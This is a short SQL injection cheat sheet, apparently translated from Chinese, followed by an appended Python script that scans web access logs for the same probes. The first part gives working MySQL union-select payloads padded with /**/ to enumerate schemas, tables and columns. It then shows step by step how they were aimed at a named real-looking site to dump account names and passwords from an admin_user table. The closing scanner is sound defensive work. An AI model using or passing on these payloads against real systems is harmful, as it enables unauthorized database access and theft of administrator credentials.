Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
MySQL 5 advanced injection method: dumping tables

Example follows:

1. Dump table names

http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hexadecimal encoding of the database name yd_teamnet)

Stepping through the limit offset this way, the admin_user table turned up as the 4th result.
2. Dump column names

http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
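A defender's counterpart to the probes above, added here and not part of the original post: a small Python scanner over web access-log lines that undoes the /**/ comment padding and URL-encoding, flags union/select and information_schema access in request query strings, and decodes the 0x hex literals so a responder can see which schema or table name was being enumerated. The log lines, the /content.php path and the hex values are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /content.php?id=13240 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:12:00:02 +0000] "GET /content.php?id=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x7765625f617070/**/limit/**/0,1/* HTTP/1.1" 200 5130
203.0.113.5 - - [10/Oct/2023:12:00:03 +0000] "GET /content.php?id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2CCOLUMN_NAME%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.COLUMNS%2F%2A%2A%2Fwhere%2F%2A%2A%2FTABLE_NAME%3D0x7573657273 HTTP/1.1" 200 5130
198.51.100.7 - - [10/Oct/2023:12:00:04 +0000] "GET /search.php?q=union+station+select+hotels HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")  # 0x-encoded string literal

def normalize(query: str) -> str:
    """URL-decode, turn /**/ comment padding back into spaces, lowercase."""
    s = unquote_plus(query)
    s = re.sub(r"/\*.*?\*/", " ", s)   # /**/ is used as a whitespace substitute
    return re.sub(r"\s+", " ", s).lower()

def indicators(norm: str) -> list:
    """Name the enumeration traits present in a normalized query string."""
    found = []
    if re.search(r"\bunion\s+(all\s+)?select\b", norm):
        found.append("union-select")
    if "information_schema." in norm:
        found.append("information_schema")
    if HEX_RE.search(norm):
        found.append("hex-literal")
    return found

def decode_hex_literals(norm: str) -> list:
    """Decode 0x literals so the probed schema/table names are readable."""
    return [bytes.fromhex(m.group(1)).decode("ascii", "replace") for m in HEX_RE.finditer(norm)]

def scan_log(text: str) -> list:
    """Return one finding per request whose query string shows schema enumeration."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        client, target = m.groups()
        norm = normalize(target.split("?", 1)[1])
        inds = indicators(norm)
        if "union-select" in inds or "information_schema" in inds:
            hits.append({"line": lineno, "client": client, "indicators": inds,
                         "hex_decoded": decode_hex_literals(norm)})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The benign "union station" search on the last line is not flagged because the check requires union followed directly by select after normalization.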